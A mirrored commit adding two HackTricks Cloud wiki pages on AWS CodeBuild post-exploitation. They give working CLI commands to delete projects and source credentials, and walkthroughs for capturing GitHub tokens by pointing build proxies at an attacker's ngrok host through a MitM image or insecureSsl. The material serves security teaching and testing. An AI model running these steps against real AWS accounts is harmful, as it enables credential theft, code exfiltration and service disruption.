gitea-mirror/hacktricks-cloud
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks-cloud.git synced 2025-12-30 06:30:35 -08:00
Code Issues Packages Projects Releases Wiki Activity

Recreating repository history for branch master

Browse Source
This commit is contained in:
Carlos Polop
2024-12-12 19:35:48 +01:00
commit 5ef56bb6b3
1076 changed files with 67158 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

111
pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/README.md Normal file
View File

@@ -0,0 +1,111 @@
# AWS - CodeBuild Post Exploitation
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## CodeBuild
For more information, check:
{% content-ref url="../../aws-services/aws-codebuild-enum.md" %}
[aws-codebuild-enum.md](../../aws-services/aws-codebuild-enum.md)
{% endcontent-ref %}
### Check Secrets
If credentials have been set in Codebuild to connect to Github, Gitlab or Bitbucket in the form of personal tokens, passwords or OAuth token access, these **credentials are going to be stored as secrets in the secret manager**.\
Therefore, if you have access to read the secret manager you will be able to get these secrets and pivot to the connected platform.
{% content-ref url="../../aws-privilege-escalation/aws-secrets-manager-privesc.md" %}
[aws-secrets-manager-privesc.md](../../aws-privilege-escalation/aws-secrets-manager-privesc.md)
{% endcontent-ref %}
### Abuse CodeBuild Repo Access
In order to configure **CodeBuild**, it will need **access to the code repo** that it's going to be using. Several platforms could be hosting this code:
<figure><img src="../../../../.gitbook/assets/image (96).png" alt=""><figcaption></figcaption></figure>
The **CodeBuild project must have access** to the configured source provider, either via **IAM role** of with a github/bitbucket **token or OAuth access**.
An attacker with **elevated permissions in over a CodeBuild** could abuse this configured access to leak the code of the configured repo and others where the set creds have access.\
In order to do this, an attacker would just need to **change the repository URL to each repo the config credentials have access** (note that the aws web will list all of them for you):
<figure><img src="../../../../.gitbook/assets/image (107).png" alt=""><figcaption></figcaption></figure>
And **change the Buildspec commands to exfiltrate each repo**.
{% hint style="warning" %}
However, this **task is repetitive and tedious** and if a github token was configured with **write permissions**, an attacker **won't be able to (ab)use those permissions** as he doesn't have access to the token.\
Or does he? Check the next section
{% endhint %}
### Leaking Access Tokens from AWS CodeBuild
You can leak access given in CodeBuild to platforms like Github. Check if any access to external platforms was given with:
```bash
aws codebuild list-source-credentials
```
{% content-ref url="aws-codebuild-token-leakage.md" %}
[aws-codebuild-token-leakage.md](aws-codebuild-token-leakage.md)
{% endcontent-ref %}
### `codebuild:DeleteProject`
An attacker could delete an entire CodeBuild project, causing loss of project configuration and impacting applications relying on the project.
```bash
aws codebuild delete-project --name <value>
```
**Potential Impact**: Loss of project configuration and service disruption for applications using the deleted project.
### `codebuild:TagResource` , `codebuild:UntagResource`
An attacker could add, modify, or remove tags from CodeBuild resources, disrupting your organization's cost allocation, resource tracking, and access control policies based on tags.
```bash
aws codebuild tag-resource --resource-arn <value> --tags <value>
aws codebuild untag-resource --resource-arn <value> --tag-keys <value>
```
**Potential Impact**: Disruption of cost allocation, resource tracking, and tag-based access control policies.
### `codebuild:DeleteSourceCredentials`
An attacker could delete source credentials for a Git repository, impacting the normal functioning of applications relying on the repository.
```sql
aws codebuild delete-source-credentials --arn <value>
```
**Potential Impact**: Disruption of normal functioning for applications relying on the affected repository due to the removal of source credentials.
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}

216
pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md Normal file
View File

@@ -0,0 +1,216 @@
# AWS Codebuild - Token Leakage
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## Recover Github/Bitbucket Configured Tokens
First, check if there are any source credentials configured that you could leak:
```bash
aws codebuild list-source-credentials
```
### Via Docker Image
If you find that authentication to for example Github is set in the account, you can **exfiltrate** that **access** (**GH token or OAuth token**) by making Codebuild to **use an specific docker image** to run the build of the project.
For this purpose you could **create a new Codebuild project** or change the **environment** of an existing one to set the **Docker image**.
The Docker image you could use is [https://github.com/carlospolop/docker-mitm](https://github.com/carlospolop/docker-mitm). This is a very basic Docker image that will set the **env variables `https_proxy`**, **`http_proxy`** and **`SSL_CERT_FILE`**. This will allow you to intercept most of the traffic of the host indicated in **`https_proxy`** and **`http_proxy`** and trusting the SSL CERT indicated in **`SSL_CERT_FILE`**.
1. **Create & Upload your own Docker MitM image**
* Follow the instructions of the repo to set your proxy IP address and set your SSL cert and **build the docker image**.
* **DO NOT SET `http_proxy`** to not intercept requests to the metadata endpoint.
* You could use **`ngrok`** like `ngrok tcp 4444` lo set the proxy to your host
* Once you have the Docker image built, **upload it to a public repo** (Dockerhub, ECR...)
2. **Set the environment**
* Create a **new Codebuild project** or **modify** the environment of an existing one.
* Set the project to use the **previously generated Docker image**
<figure><img src="../../../../.gitbook/assets/image (23).png" alt=""><figcaption></figcaption></figure>
3. **Set the MitM proxy in your host**
* As indicated in the **Github repo** you could use something like:
```bash
mitmproxy --listen-port 4444 --allow-hosts "github.com"
```
{% hint style="success" %}
The **mitmproxy version used was 9.0.1**, it was reported that with version 10 this might not work.
{% endhint %}
4. **Run the build & capture the credentials**
* You can see the token in the **Authorization** header:
<figure><img src="../../../../.gitbook/assets/image (273).png" alt=""><figcaption></figcaption></figure>
This could also be done from the aws cli with something like
{% code overflow="wrap" %}
```bash
# Create project using a Github connection
aws codebuild create-project --cli-input-json file:///tmp/buildspec.json
## With /tmp/buildspec.json
{
"name": "my-demo-project",
"source": {
"type": "GITHUB",
"location": "https://github.com/uname/repo",
"buildspec": "buildspec.yml"
},
"artifacts": {
"type": "NO_ARTIFACTS"
},
"environment": {
"type": "LINUX_CONTAINER", // Use "ARM_CONTAINER" to run docker-mitm ARM
"image": "docker.io/carlospolop/docker-mitm:v12",
"computeType": "BUILD_GENERAL1_SMALL",
"imagePullCredentialsType": "CODEBUILD"
}
}
## Json
# Start the build
aws codebuild start-build --project-name my-project2
```
{% endcode %}
### Via insecureSSL
**Codebuild** projects have a setting called **`insecureSsl`** that is hidden in the web you can only change it from the API.\
Enabling this, allows to Codebuild to connect to the repository **without checking the certificate** offered by the platform.
* First you need to enumerate the current configuration with something like:
```bash
aws codebuild batch-get-projects --name <proj-name>
```
* Then, with the gathered info you can update the project setting **`insecureSsl`** to **`True`**. The following is an example of my updating a project, notice the **`insecureSsl=True`** at the end (this is the only thing you need to change from the gathered configuration).
* Moreover, add also the env variables **http\_proxy** and **https\_proxy** pointing to your tcp ngrok like:
{% code overflow="wrap" %}
```bash
aws codebuild update-project --name <proj-name> \
--source '{
"type": "GITHUB",
"location": "https://github.com/carlospolop/404checker",
"gitCloneDepth": 1,
"gitSubmodulesConfig": {
"fetchSubmodules": false
},
"buildspec": "version: 0.2\n\nphases:\n build:\n commands:\n - echo \"sad\"\n",
"auth": {
"type": "CODECONNECTIONS",
"resource": "arn:aws:codeconnections:eu-west-1:947247140022:connection/46cf78ac-7f60-4d7d-bf86-5011cfd3f4be"
},
"reportBuildStatus": false,
"insecureSsl": true
}' \
--environment '{
"type": "LINUX_CONTAINER",
"image": "aws/codebuild/standard:5.0",
"computeType": "BUILD_GENERAL1_SMALL",
"environmentVariables": [
{
"name": "http_proxy",
"value": "http://2.tcp.eu.ngrok.io:15027"
},
{
"name": "https_proxy",
"value": "http://2.tcp.eu.ngrok.io:15027"
}
]
}'
```
{% endcode %}
* Then, run the basic example from [https://github.com/synchronizing/mitm](https://github.com/synchronizing/mitm) in the port pointed by the proxy variables (http\_proxy and https\_proxy)
```python
from mitm import MITM, protocol, middleware, crypto
mitm = MITM(
host="127.0.0.1",
port=4444,
protocols=[protocol.HTTP],
middlewares=[middleware.Log], # middleware.HTTPLog used for the example below.
certificate_authority = crypto.CertificateAuthority()
)
mitm.run()
```
* Finally, click on **Build the project**, the **credentials** will be **sent in clear text** (base64) to the mitm port:
<figure><img src="../../../../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure>
### ~~Via HTTP protocol~~
{% hint style="success" %}
**This vulnerability was corrected by AWS at some point the week of the 20th of Feb of 2023 (I think on Friday). So an attacker can't abuse it anymore :)**
{% endhint %}
An attacker with **elevated permissions in over a CodeBuild could leak the Github/Bitbucket token** configured or if permissions was configured via OAuth, the **temporary OAuth token used to access the code**.
* An attacker could add the environment variables **http\_proxy** and **https\_proxy** to the CodeBuild project pointing to his machine (for example `http://5.tcp.eu.ngrok.io:14972`).
<figure><img src="../../../../.gitbook/assets/image (232).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../../../.gitbook/assets/image (213).png" alt=""><figcaption></figcaption></figure>
* Then, change the URL of the github repo to use HTTP instead of HTTPS, for example: `http://github.com/carlospolop-forks/TestActions`
* Then, run the basic example from [https://github.com/synchronizing/mitm](https://github.com/synchronizing/mitm) in the port pointed by the proxy variables (http\_proxy and https\_proxy)
```python
from mitm import MITM, protocol, middleware, crypto
mitm = MITM(
host="127.0.0.1",
port=4444,
protocols=[protocol.HTTP],
middlewares=[middleware.Log], # middleware.HTTPLog used for the example below.
certificate_authority = crypto.CertificateAuthority()
)
mitm.run()
```
* Finally, click on **Build the project**, the **credentials** will be **sent in clear text** (base64) to the mitm port:
<figure><img src="../../../../.gitbook/assets/image (159).png" alt=""><figcaption></figcaption></figure>
{% hint style="warning" %}
Now an attacker will be able to use the token from his machine, list all the privileges it has and (ab)use easier than using the CodeBuild service directly.
{% endhint %}
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}